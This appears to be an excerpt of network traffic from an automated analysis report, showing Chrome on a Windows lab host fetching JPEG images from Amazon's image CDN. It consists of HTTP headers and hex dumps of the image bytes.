                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-425,/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      Expires: Wed, 10 Aug 2044 14:51:07 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-425 /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 975fd5d0332c1e0796bab30e0bb30a24.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: VnnpwAvkT9TBZiOE3ERj4oZ-PW5a2cL6anw5JlMncosx6gCNFuOwWg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC4391INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 07 02 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 eb 69 e9 3c cd 7c f9 f6 82 e5 98 a6 99 6b
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"4i<|k


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      105192.168.2.549844151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC662OUTGET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 94765
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: b8ceec20-3245-42b8-8c0c-47bf23ccb7c5
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 11 Jan 2022 14:51:27 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 99911
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200053-IAD, cache-ewr-kewr1740032-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 4a 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 01 00 69 87 04 00 01 00 00 00 1a 00 00 00 00 00 00 00 01 00 86 92 07 00 15 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 72 73 69 6f 6e 20 31 2e 30 2e 30 00 ff db 00 43 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff db 00 43 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 01 f4 07 94 03 00 11 00 01 11 01 02 11 01 ff c4
                                                                                                                                                                                                                                                                      Data Ascii: JFIFJExifII*i,Version 1.0.0CC
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 41 04 d1 c6 f9 1e d8 e3 69 7c 8f 21 ac 63 46 49 27 90 00 04 4b 65 69 0e 06 df ae e1 b3 dd 24 fc 1d 4e 79 98 b1 ba 6c 7e 77 d1 67 cf 2e fc d5 53 26 ae b1 ca 39 ba 18 7b 3e d3 1b df e1 8f dd b8 f4 c7 01 74 95 23 5a 59 6e 15 8f fa 55 35 c7 78 3f 06 11 b4 fc 9a 16 89 c9 92 dd 67 65 a8 c7 86 9d 23 79 fb b3 5a 5e 17 69 58 47 3b 7d 13 7c a3 a4 81 bf 6e c2 54 70
                                                                                                                                                                                                                                                                      Data Ascii: Ai|!cFI'Kei$Nyl~wg.S&9{>t#ZYnU5x?ge#yZ^iXG;}|nTp
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: fb c7 2f e3 65 a2 36 3a 49 1a c6 fb cf 21 a3 e2 4e 15 d9 9d a3 77 99 c7 8e 6f 68 ac 75 99 d9 9a dc 9e da 4b 44 bb 79 06 47 d9 b3 e7 ec 85 c1 c1 1c 79 63 e7 bb ea dd a9 92 34 da 2b 6d f9 69 c3 1f fe b0 c2 17 7d f2 61 01 01 01 01 01 01 01 01 01 01 05 5c 16 7b b5 43 43 a9 e8 aa 26 69 e8 e8 e2 7b 87 d6 01 5a ad a8 c7 5e b6 ac 7d 61 94 52 d3 d2 12 d4 da ee 54 a3 75 4d 24 d0 0f 19 23 7b 07 ed 00 a6 99 a9 6e ed a2 7e a4 d2 63 ac 29 96 c6 22 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 08 20 d8 fc 19 d2 2f b9 de 5b 75 9a 32 e8 29 5e 19 4d 91 c9 d3 f5 cf ea 03 9f 89 1e 0a 9e b3 2f 0d 76 8e b2 e9 f6 6e 0e 2b 71 cf 4a ba c2 c3 69 8e 18 98 31 ec c7 cf e2 e5 53 16 3d a3 75 ad 46 5e 29 5f b1 92 b7 2b a6 52 22 10 0a 00 50 08 22 82 08 0a 43 92 08 61 40 61 48
                                                                                                                                                                                                                                                                      Data Ascii: /e6:I!NwohuKDyGyc4+mi}a\{CC&i{Z^}aRTuM$#{n~c)" /[u2)^M/vn+qJi1S=uF^)_+R"P"Ca@aH
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 27 87 36 2d 5d 60 be 50 38 b6 b6 82 a2 9c 8f f9 48 de d1 f5 91 85 b6 2f 13 d2 5a 6d 8a d1 d6 25 41 82 3a 85 93 58 80 a4 10 32 81 94 04 11 40 44 08 08 08 22 80 80 80 80 80 80 80 80 80 81 dc 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 83 34 b2 54 8a bb 5c 61 fe d1 60 31 48 0f 97 2f ea ae 16 aa 9c 19 27 6f 9b ea 9d 85 a9 8d 46 8e bc 5c e6 3e 19 fa 7f c6 ca
                                                                                                                                                                                                                                                                      Data Ascii: '6-]`P8H/Zm%A:X2@D"4T\a`1H/'oF\>
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 45 a7 c1 f2 bb e9 b3 6b f5 37 b6 3a ef 13 69 e7 e1 11 e1 cf e4 be 5b f4 cd 34 38 7d 51 ed e4 fc 9f a0 3e 5d ea 86 6d 75 ad ca bc a1 eb 3b 3b d9 6c 58 b6 b6 6f f1 2d e5 f9 7f e7 eb f6 54 57 5e e8 28 47 66 d2 24 91 bc 84 51 e3 03 e2 7a 05 ab 16 96 f9 39 f4 8f 35 dd 7f 6e e9 b4 91 c3 1f 15 a3 f2 d7 c3 e7 e1 1f cf a2 c3 36 a5 ba 3e 42 e6 3c 44 de e6 35 a0 fd a4 15 d2 ae 87 1c 47 3e 6f 1f 9f da 8d 5d ed bd 66 29 1e 51 11 fd 77 5a 95 b7 9d 10 10 10 10 74 1f 03 74 43 2d 96 61 a8 2b 23 ff 00 c2 17 26 ff 00 a3 6e 1c e3 a6 ea dc 79 c9 ef 7c 30 be 7f ed 2f 69 4e 5c 9e e6 b3 f0 53 af ad bf e3 f9 dd db d0 60 e1 af 14 f5 9f e1 b4 97 97 74 04 04 04 04 04 04 04 1a 37 8f 9a 32 2a 79 a1 d5 14 71 86 b6 a1 c2 0b 8b 5a 39 76 98 fc 5c bc bf 28 34 b5 de 78 f1 5e e3 d9 6e d1 9b
                                                                                                                                                                                                                                                                      Data Ascii: Ek7:i[48}Q>]mu;;lXo-TW^(Gf$Qz95n6>B<D5G>o]f)QwZttC-a+#&ny|0/iN\S`t72*yqZ9v\(4x^n
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: f3 cd 5a 16 4c 51 27 9a 80 ca 06 54 82 06 50 10 45 01 01 03 28 19 41 a5 b8 e9 a3 b5 1c fa 86 9b 54 5b 2d 6f bd 50 be 89 b4 15 b4 d0 03 25 45 39 8d e6 46 ca c8 f2 3d 83 9c 1d bc f2 b2 ac b1 b4 6f d5 53 c0 1d 17 a8 ad 75 97 ad 47 75 a3 7d ae 9a e7 0c 54 b4 54 13 0d b3 c8 23 71 71 9e 46 fd 1e b8 6e 79 a8 b1 5e 8d c2 b1 64 20 c7 35 c7 10 74 a6 88 b6 c1 72 d4 b5 2f a5 a5 a9 98 53 c0 62 89 d3 39 d2 63 71 f6 5b d0 06 8c 94 16 cb 4f 1a 38 4b 76 78 8e 8f 54 d1 b6 47 73 11 d4 97 53 b8 fc 3b 40 d0 54 6e cb 86 59 75 15 5d 05 c2 21 2d be b2 9e b6 27 7b b2 53 ca c9 01 f8 6d 25 4e e8 d9 ee e8 a6 6f bc c2 07 c1 10 90 94 04 13 65 01 48 8a 02 08 84 11 50 08 23 84 10 c0 40 41 05 21 84 0c 20 6d 41 0d a8 20 58 d7 75 19 41 69 be e9 7b 3d ea 8d f4 b7 1a 46 55 41 20 da e6 b8 0c
                                                                                                                                                                                                                                                                      Data Ascii: ZLQ'TPE(AT[-oP%E9F=oSuGu}TT#qqFny^d 5tr/Sb9cq[O8KvxTGsS;@TnYu]!-'{Sm%NoeHP#@A! mA XuAi{=FUA
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0b d5 bb 47 6a 0a f0 1f 1d 31 8a 23 d2 49 bf 16 3e a3 ed 1f 90 56 31 e9 72 5b c1 53 2e bb 15 3a ce f3 e8 bf 53 70 be a0 80 6a 6b d8 c3 de d8 d8 5f f6 b8 b3 ee 56 ab d9 f3 e3 2a 56 ed 78 f0 aa ac 70 c2 8b 1c eb a4 cf 8e c6 ff 00 8a cf ff 00 4f 8f 36 af fd 5e df a6 14 f3 f0 bd f8 26 9e e0 09 ee 6c 91 e3 ed 0e 3f 72 c2 dd 9f e5 2c eb da fe 75 fd d6 3b 86 86 d4 54 60 b8 40 2a 63 1d 5d 01 df fb 27 0e fb 15 7b e8 f2 57 c3 7f 92 e6 2e d0 c5 7f 1d be 6b 0b 98 e6 38 b5 e0 b5 cd 38 2d 23 04 15 5a 61 76 27 74 14 24 40 40 40 40 40 40 41 16 31 ef 78 63 1a 5c f7 72 0d 03 24 a4 cc 44 6f 2c a9 8e d7 98 ad 63 79 9f 08 5f 2d fa 5e 69 30 fa c7 76 4c ff 00 93 6f 37 1f 89 e8 17 3f 36 be 23 95 79 bd 6f 67 7b 29 92 fb 5b 3c f0 57
                                                                                                                                                                                                                                                                      Data Ascii: Gj1#I>V1r[S.:Spjk_V*VxpO6^&l?r,u;T`@*c]'{W.k88-#Zav't$@@@@@@A1xc\r$Do,cy_-^i0vLo7?6#yog{)[<W
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: de 7a b9 c7 25 74 6b 58 ac 6d 0f 21 9b 3d f2 db 8a f3 36 b4 f9 a4 52 d4 cb f4 c4 1d 9d b0 3c f5 99 c5 df 21 ec 8f b9 71 75 f7 df 26 de 4f a6 7b 2d a7 e0 d2 71 7e bb 4c ff 00 4f e8 c7 6b ab 1e eb b4 b5 4c 3c db 2e 58 7c 98 70 df b9 74 f1 62 8f 77 15 9f 27 88 d7 eb 66 75 b6 cd 5e b1 7e 5f fd bd 3f 86 57 5b 13 2e 16 a7 06 73 ed 58 1f 1f c7 de 0b 8f 8a d3 8f 27 3f 09 7d 17 5b 8a ba dd 1c f0 fe 7a ef 5f 9f 58 60 eb be f9 28 80 80 80 80 80 83 2e e1 35 dd b6 bd 7d 6a 96 47 6d 8a a1 e6 96 4f fa 76 96 37 f6 cb 4a e4 f6 ee 9f de e9 2f 11 d6 39 fd b9 ff 00 0b 3a 3b f0 e5 87 53 af 96 bd 10 80 80 80 80 80 80 80 83 ca a6 a2 1a 6a 79 6a 26 70 64 30 b1 d2 48 f3 d0 35 83 2e 3f 20 16 54 a4 da 62 23 ac a2 67 68 dd c7 57 7b 83 ee 57 6a db 84 9c 9f 59 3c 93 b8 78 19 1e 5d 8f
                                                                                                                                                                                                                                                                      Data Ascii: z%tkXm!=6R<!qu&O{-q~LOkL<.X|ptbw'fu^~_?W[.sX'?}[z_X`(.5}jGmOv7J/9:;Sjyj&pd0H5.? Tb#ghW{WjY<x]
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 8b b7 69 35 45 77 64 ee d1 9d ac d2 17 67 77 7f 2c 28 91 88 f1 17 44 db 2d 17 e6 dd a9 e9 a8 59 4f 7e 9c 43 3c b5 16 a9 6f 75 32 57 4c e2 43 64 2f 79 10 d2 ed 18 21 80 60 f3 0a 50 cb 38 61 a2 6e ba 6a 9a 69 aa a5 34 31 57 30 3a 5d 31 0c ae a9 a2 a3 a9 6b 88 7c b4 93 49 f8 d6 c7 2b 43 5d d9 9e 4d 50 96 71 cd 04 72 50 49 24 71 4a dd b2 b1 af 6e 73 b5 c0 11 9f 14 1e 66 8a 8c c8 e9 3b 21 bd e3 0e 23 23 23 e0 3b fc d0 78 ba d5 1f 67 b6 39 a4 6b f3 90 f7 61 fc bf 24 82 39 84 12 c9 6e 97 b4 1d 9b d9 d9 1f 78 38 10 e0 7c b1 c8 a0 f1 75 15 58 63 dc 63 c9 69 e4 d6 38 1d c3 c5 b9 c7 d4 50 78 ba 39 9b d9 ee 63 da 65 f7 03 9a 7a f8 1c 67 07 e2 82 4e d3 05 cd c8 dc cf 7d b9 c1 1f 1c a6 e1 97 78 15 22 60 f5 02 60 e5 22 21 dc d4 09 b7 20 81 28 22 10 45 01 04 50 44 29 11
                                                                                                                                                                                                                                                                      Data Ascii: i5Ewdgw,(D-YO~C<ou2WLCd/y!`P8anji41W0:]1k|I+C]MPqrPI$qJnsf;!###;xg9ka$9nx8|uXcci8Px9cezgN}x"``"! ("EPD)
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0c cf 86 b6 a1 35 74 f7 19 06 5b 4c 36 45 9f cb 78 e6 7e 4d fb d7 43 41 8f 7b 4d bc 9c 9e d5 cd b5 62 91 e2 d8 cb aa e0 88 08 08 08 08 08 08 08 08 08 30 9e 25 da 84 94 90 5c 98 3d b8 5d d9 4a 7f 31 dc da 4f c1 df 7a e7 eb f1 ef 11 67 5f b2 b3 6d 69 a7 9f 36 bc 5c a7 74 40 40 40 40 40 40 41 59 69 af 65 0d 5f 6e f8 cc 9e c9 68 00 e3 19 ef 5a 35 18 67 25 76 89 d9 d4 ec 7e d0 ae 93 37 bc b5 78 b9 6d d7 f7 54 5f 2e d1 5c 1d 0f 64 1c d6 46 0e 43 b1 ef 1f 81 3e 0b 5e 93 4f 38 f7 df c5 73 b7 bb 5e 9a c9 a7 04 4c 45 62 7a f9 cf fe 16 b5 6d e7 c4 04
                                                                                                                                                                                                                                                                      Data Ascii: 5t[L6Ex~MCA{Mb0%\=]J1Ozg_mi6\t@@@@@@AYie_nhZ5g%v~7xmT_.\dFC>^O8s^LEbzm


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      106192.168.2.549845151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC662OUTGET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 39516
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 0fd27b01-5385-4286-ac07-7fe05b79c898
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 11 Jan 2022 14:48:33 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      Age: 100334
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100053-IAD, cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 ff db 00 43 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c0 00 11 08 00 fa 01 2c 03 00 11 00 01 11 01 02 11 01 ff c4 00 1f 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 0a 03 04 0b 02 01 ff c4 00 54 10 00 00 05 03 03 03 02 04 03 05 03 05 0a 0c 07 00 01 02 03 04 05 00 06 07 08 11 12 09 13 21 14 31 0a 22 41 51 15 32 61 16
                                                                                                                                                                                                                                                                      Data Ascii: JFIFCC,T!1"AQ2a
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 15 ba 49 91 a5 bd 35 3f 21 03 0c f5 b4 79 0a 20 08 a6 29 3a 76 a2 69 94 36 4d 25 45 32 80 10 03 6b 8d 65 74 93 61 4d 2e 37 3a ed 7e fd 89 56 aa 0c 3a 28 31 97 06 0b 02 cb db b8 dc 0d 96 bf fa aa c4 56 7e bf fa e0 eb d6 c2 d6 3e b1 62 34 51 6d 59 f7 0d de d2 d4 ca b7 6a 2d e5 a3 82 3e d2 98 6d 6f c2 45 a0 94 84 c4 3a 69 fa a6 02 0e 48 05 5f c6 c6 f9 04 44 44 32 3a 29 cd 35 03 1d 13 0b c9 e2 07 8f 1e 47 87 05 8a 62 14 c2 af 13 91 b3 3c 46 07 02 7c 2c 00 e2 38 8d d4 f9 ad 0e 88 30 3d 31 32 a7 4f 0b ed 2d 50 35 d5 15 b1 a8 bc 9b 6f c7 27 1c 36 4a 76 f3 22 30 42 46 31 e0 2b cc d3 b3 44 74 93 84 dc ed c4 4a 50 db ea 20 3b 54 9a 5c c0 6a e3 91 ba 74 d9 a4 f1 bf e0 14 fa cc b0 28 a5 89 da f5 07 3c 0e 16 fc 4a cc 8f 56 ab d7 01 e8 67 ac 57 4f a9 c8 0d 1b e3 8c 87
                                                                                                                                                                                                                                                                      Data Ascii: I5?!y ):vi6M%E2ketaM.7:~V:(1V~>b4QmYj->moE:iH_DD2:)5Gb<F|,80=12O-P5o'6Jv"0BF1+DtJP ;T\jt(<JVgWO
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 25 3b 82 8d 8d c8 f8 7c ae a4 23 bb 6e 59 90 38 73 66 a3 25 52 59 c2 60 b8 24 75 d9 2e a2 27 21 00 76 03 14 e3 58 15 3d 3d 6d 1d e3 ea 83 c7 7d af fa f7 ad 99 53 57 87 d7 5a 4e b9 d1 9b 6e 2f 6f 97 e2 16 05 6d bd 6d 60 ce 9b bd 54 ed 4d 4a e8 2f 2e de 5a b2 c0 96 5b 46 71 d7 35 cb 7d 28 e1 ac dd dd 17 25 1a 0d 26 99 f2 7b 1b 1a aa 49 90 c2 07 66 2a b7 01 21 d3 4c 4d c8 00 40 72 33 87 49 53 46 63 95 a1 8e be d6 e0 3b b9 95 89 8c 56 2a 4a e1 24 2e 74 8c b5 8d f8 9e f1 b8 1e e5 9b 9d 51 c9 7c 34 bd 57 6f 85 f5 4d 7e ea ca e9 d2 56 71 ba 51 61 fe 53 61 d2 66 e6 19 c4 83 84 59 91 b2 67 7c da 46 12 5d 92 ae 13 4d 22 a6 65 98 af c4 dc 40 4f c8 44 04 6c 54 9f d2 94 4d d0 1b a9 bc b9 fd 0f d5 64 95 a3 07 af 77 58 e7 e9 77 3e 5f 51 f4 54 33 ac 77 56 2d 01 6a 5e e5
                                                                                                                                                                                                                                                                      Data Ascii: %;|#nY8sf%RY`$u.'!vX==m}SWZNn/omm`TMJ/.Z[Fq5}(%&{If*!LM@r3ISFc;V*J$.tQ|4WoM~VqQaSafYg|F]M"e@ODlTMdwXw>_QT3wV-j^
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: bd 6e 2d 49 4d 44 f8 84 a6 52 e0 40 de fc 45 b8 f7 0f 15 a3 25 6c 45 aa d2 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 aa 78 63 08 65 ed 45 64 48 1c 4b 82 f1 c4 be 55 c9 37 31 8e 10 96 74 23 35 5e bd 58 a9 10 54 51 41 2a 40 20 44 93 28 09 94 50 e2 04 21 40 44 c2 00 1b d4 8a 8a 98 e2 66 a7 9b 05 53 4b 49 2c ef d1 18 bb 95 69 d4 fe 82 35 8b a2 f6 b6 8b fd 51 e9 fa 7f 0d 47 df 8a 3a 46 d1 92 94 49 b9 9a be 59 89 53 3a e9 11 66 6a ac 40 50 85 54 a6 e0 63 01 84 07 70 01 00 1d a9 e8 f1 38 2a 09 11 ba f6 55 35 f8 45 4d 30 06 56 96 83 fa e4 ad 0e ab d5 b5 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 9e 31 b6 34 c8 59 8e fb b6 31 86 29 b2 a4 f2 26 44 bd 1c 95 9d a9 65 c3 b3 5d fc 93 f7 26
                                                                                                                                                                                                                                                                      Data Ascii: n-IMDR@E%lED%(DJ"QD%(DJ"xceEdHKU71t#5^XTQA*@ D(P!@DfSKI,i5QG:FIYS:fj@PTcp8*U5EM0V(DJ"QD%(DJ"QD%(DJ"14Y1)&De]&
